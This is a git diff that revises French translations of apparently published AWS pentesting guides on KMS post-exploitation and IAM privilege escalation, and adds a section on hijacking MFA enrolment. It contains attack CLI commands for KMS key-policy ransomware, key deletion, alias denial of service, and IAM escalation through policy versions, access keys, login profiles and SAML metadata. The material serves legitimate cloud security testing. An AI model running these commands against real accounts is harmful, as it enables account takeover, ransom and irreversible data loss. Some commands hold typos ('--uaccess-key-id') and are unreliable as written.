diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation/README.md
index 829515113..86d58103a 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation/README.md
@@ -12,15 +12,15 @@ Pour plus d'informations, consultez :
### Encrypt/Decrypt information
-`fileb://` and `file://` sont des schémas d'URI utilisés dans les commandes AWS CLI pour spécifier le chemin vers des fichiers locaux:
+`fileb://` and `file://` sont des schémas URI utilisés dans les commandes AWS CLI pour spécifier le chemin vers des fichiers locaux :
-- `fileb://:` Lit le fichier en mode binaire, couramment utilisé pour les fichiers non textuels.
-- `file://:` Lit le fichier en mode texte, généralement utilisé pour les fichiers texte simples, scripts ou JSON qui n'ont pas d'exigences d'encodage particulières.
+- `fileb://:` Lit le fichier en mode binaire, couramment utilisé pour des fichiers non texte.
+- `file://:` Lit le fichier en mode texte, généralement utilisé pour des fichiers en texte brut, des scripts, ou du JSON qui n'a pas d'exigences d'encodage particulières.
> [!TIP]
-> Notez que si vous voulez decrypt des données à l'intérieur d'un fichier, le fichier doit contenir les données binaires, pas des données encodées en base64. (fileb://)
+> Notez que si vous souhaitez déchiffrer des données contenues dans un fichier, le fichier doit contenir les données binaires, et non des données encodées en base64. (fileb://)
-- Using a **symmetric** key
+- Utilisation d'une clé **symétrique**
```bash
# Encrypt data
aws kms encrypt \
@@ -38,7 +38,7 @@ aws kms decrypt \
--query Plaintext | base64 \
--decode
```
-- Utiliser une clé **asymétrique** :
+- Utiliser une clé **asymétrique**:
```bash
# Encrypt data
aws kms encrypt \
@@ -60,14 +60,14 @@ aws kms decrypt \
```
### KMS Ransomware
-Un attaquant disposant d'un accès privilégié à KMS peut modifier la KMS policy des clés et **accorder à son compte l'accès à celles-ci**, supprimant l'accès accordé au compte légitime.
+Un attaquant disposant d'un accès privilégié à KMS pourrait modifier la KMS policy des keys et **accorder à son compte l'accès à celles-ci**, supprimant l'accès accordé au compte légitime.
-Les utilisateurs du compte légitime ne pourront alors plus accéder à aucune information de tout service chiffré avec ces clés, créant un ransomware simple mais efficace contre le compte.
+Les utilisateurs du compte légitime ne pourront alors plus accéder à aucune information d'aucun service chiffré avec ces keys, créant un ransomware simple mais efficace contre le compte.
> [!WARNING]
-> Notez que **AWS managed keys ne sont pas affectées** par cette attaque, seulement les **Customer managed keys**.
->
-> Notez aussi la nécessité d'utiliser le paramètre **`--bypass-policy-lockout-safety-check`** (l'absence de cette option dans la web console rend cette attaque possible uniquement depuis le CLI).
+> Notez que **AWS managed keys aren't affected** par cette attaque, seules **Customer managed keys** le sont.
+
+> Notez aussi la nécessité d'utiliser le paramètre **`--bypass-policy-lockout-safety-check`** (l'absence de cette option dans la web console rend cette attaque possible uniquement depuis la CLI).
```bash
# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
@@ -92,28 +92,28 @@ aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
}
```
> [!CAUTION]
-> Notez que si vous changez cette policy et ne donnez l'accès qu'à un external account, puis que depuis cet external account vous essayez de définir une nouvelle policy pour **give the access back to original account, you won't be able cause the Put Polocy action cannot be performed from a cross account**.
+> Notez que si vous modifiez cette policy et ne donnez l'accès qu'à un compte externe, et que depuis ce compte externe vous essayez ensuite de définir une nouvelle policy pour **rendre l'accès au compte d'origine, vous ne pourrez pas le faire car l'action Put Polocy ne peut pas être exécutée depuis un compte croisé**.
-### Generic KMS Ransomware
+### KMS Ransomware générique
-Il existe une autre façon d'effectuer un global KMS Ransomware, qui impliquerait les étapes suivantes :
+Il existe une autre façon d'exécuter un KMS Ransomware global, qui impliquerait les étapes suivantes :
-- Créer une nouvelle **key with a key material** importée par l'attacker
-- **Re-encrypt older data** of the victim encrypted with the previous version with the new one.
-- **Delete the KMS key**
-- Maintenant seul l'attacker, qui possède le original key material, pourra être capable de decrypt the encrypted data
+- Créer une nouvelle **clé avec un key material** importé par l'attaquant
+- **Ré-encrypter les anciennes données** de la victime chiffrées avec la version précédente en utilisant la nouvelle
+- **Supprimer la clé KMS**
+- Désormais seul l'attaquant, qui possède le key material original, pourrait être capable de déchiffrer les données chiffrées
-### Delete Keys via kms:DeleteImportedKeyMaterial
+### Supprimer des clés via kms:DeleteImportedKeyMaterial
-Avec la permission `kms:DeleteImportedKeyMaterial`, un actor peut delete the imported key material des CMKs avec `Origin=EXTERNAL` (CMKs that have imperted their key material), les rendant incapables de decrypt data. Cette action est destructive et irréversible sauf si du compatible material est re-imported, permettant à un attacker de provoquer effectivement une perte de données de type ransomware en rendant l'information encrypted définitivement inaccessible.
+Avec la permission `kms:DeleteImportedKeyMaterial`, un acteur peut supprimer le key material importé des CMKs ayant `Origin=EXTERNAL` (CMKs qui ont importé leur key material), les rendant incapables de déchiffrer les données. Cette action est destructive et irréversible à moins qu'un key material compatible ne soit ré-importé, permettant à un attaquant de provoquer effectivement une perte de données de type ransomware en rendant l'information chiffrée définitivement inaccessible.
```bash
aws kms delete-imported-key-material --key-id
```
-### Détruire les clés
+### Détruire des clés
-En détruisant des clés, il est possible d'effectuer un DoS.
+La destruction des clés permet d'effectuer un DoS.
```bash
# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
@@ -121,10 +121,10 @@ aws kms schedule-key-deletion \
--pending-window-in-days 7
```
> [!CAUTION]
-> Notez qu'AWS **empêche désormais que les actions précédentes soient effectuées depuis un autre compte :**
+> Notez que AWS **empêche désormais que les actions précédentes soient effectuées depuis un cross account :**
### Modifier ou supprimer Alias
-Cette attaque supprime ou redirige les aliases AWS KMS, rompant la résolution des clés et provoquant des échecs immédiats dans tous les services qui dépendent de ces aliases, entraînant un déni de service. Avec des permissions telles que `kms:DeleteAlias` ou `kms:UpdateAlias`, un attaquant peut supprimer ou rediriger des aliases et perturber les opérations cryptographiques (p. ex., encrypt, describe). Tout service qui référence l'alias au lieu du key ID peut échouer jusqu'à ce que l'alias soit restauré ou correctement réaffecté.
+Cette attaque supprime ou redirige les aliases AWS KMS, interrompant la résolution des clés et provoquant des échecs immédiats dans tous les services qui s'appuient sur ces aliases, entraînant un déni de service. Avec des autorisations telles que `kms:DeleteAlias` ou `kms:UpdateAlias`, un attaquant peut supprimer ou rediriger des aliases et perturber les opérations cryptographiques (par ex., encrypt, describe). Tout service qui référence l'alias au lieu de l'ID de clé peut échouer jusqu'à ce que l'alias soit restauré ou correctement remappé.
```bash
# Delete Alias
aws kms delete-alias --alias-name alias/
@@ -135,7 +135,7 @@ aws kms update-alias \
--target-key-id
```
### Cancel Key Deletion
-Avec des permissions telles que `kms:CancelKeyDeletion` et `kms:EnableKey`, un acteur peut annuler une suppression programmée d'une AWS KMS customer master key et la réactiver plus tard. Ce faisant, il récupère la clé (initialement en état Disabled) et restaure sa capacité à déchiffrer des données précédemment protégées, permettant l'exfiltration.
+Avec des permissions telles que `kms:CancelKeyDeletion` et `kms:EnableKey`, un acteur peut annuler la suppression programmée d'une customer master key AWS KMS et la réactiver ultérieurement. Cela permet de récupérer la clé (initialement en état Disabled) et de restaurer sa capacité à déchiffrer des données précédemment protégées, permettant l'exfiltration.
```bash
# Firts cancel de deletion
aws kms cancel-key-deletion \
@@ -146,13 +146,13 @@ aws kms enable-key \
--key-id
```
### Désactiver la clé
-Avec la permission `kms:DisableKey`, un acteur peut désactiver une CMK (customer master key) AWS KMS, empêchant son utilisation pour le chiffrement ou le déchiffrement. Cela coupe l'accès pour tous les services qui dépendent de cette CMK et peut provoquer des perturbations immédiates ou un déni de service jusqu'à ce que la clé soit réactivée.
+Avec la permission `kms:DisableKey`, un acteur peut désactiver une Customer Master Key AWS KMS, l'empêchant d'être utilisée pour le chiffrement ou le déchiffrement. Cela coupe l'accès pour tous les services qui dépendent de cette CMK et peut provoquer des perturbations immédiates ou un déni de service jusqu'à ce que la clé soit réactivée.
```bash
aws kms disable-key \
--key-id
```
### Derive Shared Secret
-Avec la permission `kms:DeriveSharedSecret`, un acteur peut utiliser une clé privée stockée dans KMS ainsi qu'une clé publique fournie par l'utilisateur pour calculer un secret partagé ECDH.
+Avec la permission `kms:DeriveSharedSecret`, un acteur peut utiliser une clé privée détenue par KMS ainsi qu'une clé publique fournie par l'utilisateur pour calculer un secret partagé ECDH.
```bash
aws kms derive-shared-secret \
--key-id \
@@ -160,7 +160,7 @@ aws kms derive-shared-secret \
--key-agreement-algorithm
```
### Impersonation via kms:Sign
-Avec la permission `kms:Sign`, un acteur peut utiliser une CMK stockée dans KMS pour signer cryptographiquement des données sans exposer la private key, produisant des signatures valides qui peuvent permettre l'impersonation ou autoriser des actions malveillantes.
+Avec la permission `kms:Sign`, un acteur peut utiliser un CMK stocké dans KMS pour signer cryptographiquement des données sans exposer la private key, produisant des signatures valides qui peuvent permettre l'impersonation ou autoriser des actions malveillantes.
```bash
aws kms sign \
--key-id \
@@ -168,8 +168,8 @@ aws kms sign \
--signing-algorithm \
--message-type RAW
```
-### DoS avec Custom Key Stores
-Avec des autorisations comme `kms:DeleteCustomKeyStore`, `kms:DisconnectCustomKeyStore` ou `kms:UpdateCustomKeyStore`, un acteur peut modifier, déconnecter ou supprimer un AWS KMS Custom Key Store (CKS), rendant ses clés principales inopérantes. Cela interrompt les opérations de chiffrement, de déchiffrement et de signature pour tous les services qui dépendent de ces clés et peut provoquer un denial-of-service immédiat. Il est donc essentiel de restreindre et de surveiller ces autorisations.
+### DoS with Custom Key Stores
+Avec des permissions comme `kms:DeleteCustomKeyStore`, `kms:DisconnectCustomKeyStore` ou `kms:UpdateCustomKeyStore`, un acteur peut modifier, déconnecter ou supprimer un AWS KMS Custom Key Store (CKS), rendant ses clés maîtresses inopérantes. Cela perturbe les opérations de chiffrement, de déchiffrement et de signature pour tous les services qui dépendent de ces clés et peut provoquer un denial-of-service immédiat. Il est donc crucial de restreindre et de surveiller ces autorisations.
```bash
aws kms delete-custom-key-store --custom-key-store-id
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md
index 4aaa8727d..1358d6b87 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md
@@ -12,78 +12,97 @@ Pour plus d'informations sur IAM, consultez :
### **`iam:CreatePolicyVersion`**
-Accorde la possibilité de créer une nouvelle version d'une politique IAM, en contournant le besoin de la permission `iam:SetDefaultPolicyVersion` en utilisant le flag `--set-as-default`. Cela permet de définir des permissions personnalisées.
+Accorde la capacité de créer une nouvelle version d'une IAM policy, en contournant la nécessité de la permission `iam:SetDefaultPolicyVersion` grâce au flag `--set-as-default`. Cela permet de définir des permissions personnalisées.
**Commande d'exploitation :**
```bash
aws iam create-policy-version --policy-arn \
--policy-document file:///path/to/administrator/policy.json --set-as-default
```
-**Impact :** Escalade directement les privilèges en permettant toute action sur toute ressource.
+**Impact :** Escalade directement les privilèges en permettant toute action sur n'importe quelle ressource.
### **`iam:SetDefaultPolicyVersion`**
-Permet de changer la version par défaut d'une politique IAM vers une autre version existante, pouvant potentiellement escalader les privilèges si la nouvelle version comporte davantage d'autorisations.
+Permet de changer la version par défaut d'une politique IAM pour une autre version existante, ce qui peut escalader les privilèges si la nouvelle version possède davantage d'autorisations.
**Commande Bash :**
```bash
aws iam set-default-policy-version --policy-arn --version-id v2
```
-**Impact:** Indirect privilege escalation en autorisant des permissions supplémentaires.
+**Impact:** Escalade de privilèges indirecte en permettant davantage de permissions.
-### **`iam:CreateAccessKey`**
+### **`iam:CreateAccessKey`, (`iam:DeleteAccessKey`)**
-Permet de créer un access key ID et un secret access key pour un autre utilisateur, ce qui peut entraîner une privilege escalation.
+Permet de créer un access key ID et un secret access key pour un autre utilisateur, conduisant à une possible escalade de privilèges.
**Exploit:**
```bash
aws iam create-access-key --user-name
```
-**Impact:** Élévation de privilèges directe en assumant les permissions étendues d'un autre utilisateur.
+**Impact :** Escalade de privilèges directe en assumant les permissions étendues d'un autre utilisateur.
+
+Notez qu'un utilisateur ne peut avoir que 2 clés d'accès créées, donc si un utilisateur a déjà 2 clés d'accès, vous aurez besoin de la permission `iam:DeleteAccessKey` pour en supprimer une afin de pouvoir en créer une nouvelle :
+```bash
+aws iam delete-access-key --uaccess-key-id
+```
+### **`iam:CreateVirtualMFADevice` + `iam:EnableMFADevice`**
+
+Si vous pouvez créer un nouvel appareil MFA virtuel et l'activer sur un autre utilisateur, vous pouvez effectivement inscrire votre propre MFA pour cet utilisateur, puis demander une session validée par MFA pour ses identifiants.
+
+**Exploit:**
+```bash
+# Create a virtual MFA device (this returns the serial and the base32 seed)
+aws iam create-virtual-mfa-device --virtual-mfa-device-name
+
+# Generate 2 consecutive TOTP codes from the seed, then enable it for the user
+aws iam enable-mfa-device --user-name --serial-number \
+--authentication-code1 --authentication-code2
+```
+**Impact :** Escalade de privilèges directe en prenant le contrôle de l'inscription MFA d'un utilisateur (puis en utilisant ses permissions).
### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`**
-Permet de créer ou de mettre à jour un login profile, y compris définir des mots de passe pour la connexion à la console AWS, conduisant à une élévation de privilèges directe.
+Permet de créer ou de mettre à jour un profil de connexion, y compris de définir des mots de passe pour la connexion à la console AWS, entraînant une escalade de privilèges directe.
-**Exploit for Creation:**
+**Exploit pour la création :**
```bash
aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password ''
```
-**Exploit pour la mise à jour:**
+**Exploit pour Update:**
```bash
aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password ''
```
-**Impact :** Escalade directe des privilèges en se connectant en tant qu'utilisateur "n'importe quel".
+**Impact:** Escalade directe de privilèges en se connectant en tant que "n'importe quel" utilisateur.
### **`iam:UpdateAccessKey`**
-Permet d'activer une access key désactivée, ce qui peut conduire à un accès non autorisé si l'attaquant possède cette access key.
+Permet d'activer une access key désactivée, pouvant mener à un accès non autorisé si l'attaquant possède la clé désactivée.
-**Exploitation :**
+**Exploit:**
```bash
aws iam update-access-key --access-key-id --status Active --user-name
```
-**Impact :** Escalade directe de privilèges en réactivant des access keys.
+**Impact:** Escalade directe de privilèges en réactivant des clés d'accès.
### **`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`**
-Permet de générer ou de réinitialiser des credentials pour des services AWS spécifiques (par ex., CodeCommit, Amazon Keyspaces), en héritant des permissions de l'utilisateur associé.
+Permet de générer ou de réinitialiser des identifiants pour des services AWS spécifiques (par ex., CodeCommit, Amazon Keyspaces), en héritant des permissions de l'utilisateur associé.
**Exploit for Creation:**
```bash
aws iam create-service-specific-credential --user-name --service-name
```
-**Exploit pour Reset:**
+**Exploit pour réinitialisation :**
```bash
aws iam reset-service-specific-credential --service-specific-credential-id
```
-**Impact:** Escalade de privilèges directe au sein des permissions de service de l'utilisateur.
+**Impact:** Escalade directe de privilèges au sein des permissions de service de l'utilisateur.
### **`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`**
-Permet d'attacher des policies aux utilisateurs ou groupes, escaladant directement les privilèges en héritant des permissions de la policy attachée.
+Permet d'attacher des policies aux users ou groups, escaladant directement les privilèges en héritant des permissions de la policy attachée.
**Exploit pour l'utilisateur :**
```bash
@@ -93,17 +112,17 @@ aws iam attach-user-policy --user-name --policy-arn ""
```bash
aws iam attach-group-policy --group-name --policy-arn ""
```
-**Impact:** Élévation directe de privilèges vers tout ce que la policy accorde.
+**Impact:** Escalade de privilèges directe vers tout ce que la politique accorde.
### **`iam:AttachRolePolicy`,** ( `sts:AssumeRole`|`iam:createrole`) | **`iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`**
-Permet d'attacher ou d'ajouter des policies à des roles, users ou groups, autorisant une élévation directe de privilèges en accordant des permissions supplémentaires.
+Permet d'attacher ou d'ajouter des politiques aux rôles, utilisateurs ou groupes, permettant une escalade directe des privilèges en accordant des autorisations supplémentaires.
-**Exploit for Role:**
+**Exploit pour le rôle :**
```bash
aws iam attach-role-policy --role-name --policy-arn ""
```
-**Exploit pour les Inline Policies:**
+**Exploit pour Inline Policies:**
```bash
aws iam put-user-policy --user-name --policy-name "" \
--policy-document "file:///path/to/policy.json"
@@ -114,7 +133,7 @@ aws iam put-group-policy --group-name --policy-name ""
aws iam put-role-policy --role-name --policy-name "" \
--policy-document file:///path/to/policy.json
```
-Vous pouvez utiliser une politique comme :
+Vous pouvez utiliser une policy comme :
```json
{
"Version": "2012-10-17",
@@ -127,28 +146,28 @@ Vous pouvez utiliser une politique comme :
]
}
```
-**Impact:** Direct privilege escalation en ajoutant des permissions via des policies.
+**Impact :** Escalade directe de privilèges en ajoutant des autorisations via des policies.
### **`iam:AddUserToGroup`**
-Permet de s'ajouter à un groupe IAM, escalating privileges en héritant des permissions du groupe.
+Permet de s'ajouter à un groupe IAM, entraînant une escalade des privilèges en héritant des autorisations du groupe.
**Exploit:**
```bash
aws iam add-user-to-group --group-name --user-name
```
-**Impact:** Escalade de privilèges directe au niveau des autorisations du groupe.
+**Impact :** Escalade de privilèges directe au niveau des permissions du groupe.
### **`iam:UpdateAssumeRolePolicy`**
-Permet de modifier le document de stratégie assume role d'un rôle, permettant d'assumer ce rôle et ses autorisations associées.
+Permet de modifier le document de stratégie d'assume role d'un rôle, permettant d'assumer ce rôle et d'obtenir ses permissions associées.
**Exploit:**
```bash
aws iam update-assume-role-policy --role-name \
--policy-document file:///path/to/assume/role/policy.json
```
-Lorsque la stratégie ressemble à ce qui suit, ce qui donne à l'utilisateur l'autorisation d'assumer le rôle :
+Lorsque la politique ressemble à ce qui suit, ce qui donne à l'utilisateur l'autorisation d'assumer le rôle :
```json
{
"Version": "2012-10-17",
@@ -163,38 +182,38 @@ Lorsque la stratégie ressemble à ce qui suit, ce qui donne à l'utilisateur l'
]
}
```
-**Impact :** Élévation de privilèges directe en assumant les permissions de n'importe quel rôle.
+**Impact :** Escalade de privilèges directe en assumant les permissions de n'importe quel rôle.
### **`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`**
-Permet de téléverser une clé publique SSH pour s'authentifier sur CodeCommit et de désactiver des dispositifs MFA, conduisant à une possible élévation de privilèges indirecte.
+Permet de téléverser une clé publique SSH pour l'authentification à CodeCommit et de désactiver des dispositifs MFA, conduisant à une escalade de privilèges indirecte potentielle.
-**Exploit pour le téléversement de la clé SSH :**
+**Exploit pour le téléversement de clé SSH :**
```bash
aws iam upload-ssh-public-key --user-name --ssh-public-key-body
```
-**Exploit pour la désactivation MFA:**
+**Exploit pour la désactivation de la MFA:**
```bash
aws iam deactivate-mfa-device --user-name --serial-number
```
-**Impact:** Escalade de privilèges indirecte en activant l'accès à CodeCommit ou en désactivant la protection MFA.
+**Impact :** Escalade de privilèges indirecte en activant l'accès CodeCommit ou en désactivant la protection MFA.
### **`iam:ResyncMFADevice`**
-Permet la resynchronisation d'un appareil MFA, ce qui peut entraîner une escalade de privilèges indirecte en manipulant la protection MFA.
+Permet la resynchronisation d'un dispositif MFA, pouvant entraîner une escalade de privilèges indirecte en manipulant la protection MFA.
-**Bash Command:**
+**Commande Bash :**
```bash
aws iam resync-mfa-device --user-name --serial-number \
--authentication-code1 --authentication-code2
```
-**Impact :** Escalade de privilèges indirecte en ajoutant ou en manipulant des dispositifs MFA.
+**Impact :** Escalade de privilèges indirecte en ajoutant ou en manipulant des appareils MFA.
### `iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`)
-Avec ces permissions, vous pouvez **modifier les métadonnées XML de la connexion SAML**. Ensuite, vous pourriez abuser de la **fédération SAML** pour **vous connecter** avec n'importe quel **rôle qui lui fait confiance**.
+Avec ces permissions, vous pouvez **modifier les métadonnées XML de la connexion SAML**. Ensuite, vous pourriez abuser de la **fédération SAML** pour **login** avec n'importe quel **role qui lui fait confiance**.
-Notez que si vous faites cela **les utilisateurs légitimes ne pourront pas se connecter**. Cependant, vous pouvez obtenir le XML, le remplacer par le vôtre, vous connecter et ensuite restaurer la configuration précédente.
+Notez qu'en faisant cela, **les utilisateurs légitimes ne pourront pas login**. Cependant, vous pouvez obtenir le XML, le remplacer par le vôtre, login et reconfigurer l'accès précédent.
```bash
# List SAMLs
aws iam list-saml-providers
@@ -211,11 +230,11 @@ aws iam update-saml-provider --saml-metadata-document --saml-provider-ar
aws iam update-saml-provider --saml-metadata-document --saml-provider-arn
```
> [!NOTE]
-> TODO: Un outil capable de générer les SAML metadata et de se connecter avec un rôle spécifié
+> TODO : Un outil capable de générer les métadonnées SAML et de se connecter avec un rôle spécifié
### `iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:`**`GetOpenIDConnectProvider`**)
-(Incertain à ce sujet) Si un attaquant dispose de ces **permissions**, il pourrait ajouter un nouveau **Thumbprint** pour réussir à se connecter à tous les roles faisant confiance au provider.
+(Incertain à ce sujet) Si un attaquant possède ces **permissions**, il pourrait ajouter un nouveau **Thumbprint** pour parvenir à se connecter à tous les rôles faisant confiance au provider.
```bash
# List providers
aws iam list-open-id-connect-providers
@@ -226,7 +245,7 @@ aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-ar
```
### `iam:PutUserPermissionsBoundary`
-Cette permission permet à un attacker de mettre à jour le permissions boundary d'un utilisateur, ce qui peut potentiellement augmenter ses privileges en lui permettant d'effectuer des actions normalement restreintes par ses permissions existantes.
+Cette permission permet à un attaquant de mettre à jour le permissions boundary d’un utilisateur, ce qui peut entraîner une élévation de privilèges en lui permettant d’exécuter des actions normalement restreintes par ses permissions existantes.
```bash
aws iam put-user-permissions-boundary \
--user-name \
@@ -249,7 +268,7 @@ Un ejemplo de una política que no aplica ninguna restricción es:
```
### `iam:PutRolePermissionsBoundary`
-Un acteur disposant de iam:PutRolePermissionsBoundary peut définir une limite de permissions (permissions boundary) sur un rôle existant. Le risque survient lorsqu'une personne ayant cette permission modifie la boundary d'un rôle : elle peut restreindre indûment des opérations (provoquant une interruption de service) ou, si elle attache une boundary permissive, étendre effectivement ce que le rôle peut faire et escalader les privilèges.
+Un acteur disposant de iam:PutRolePermissionsBoundary peut définir une limite d'autorisations sur un rôle existant. Le risque survient lorsqu'une personne ayant cette permission modifie la limite d'un rôle : elle peut restreindre de manière inappropriée des opérations (provoquant une interruption de service) ou, si elle associe une limite permissive, augmenter effectivement ce que le rôle peut faire et élever ses privilèges.
```bash
aws iam put-role-permissions-boundary \
--role-name \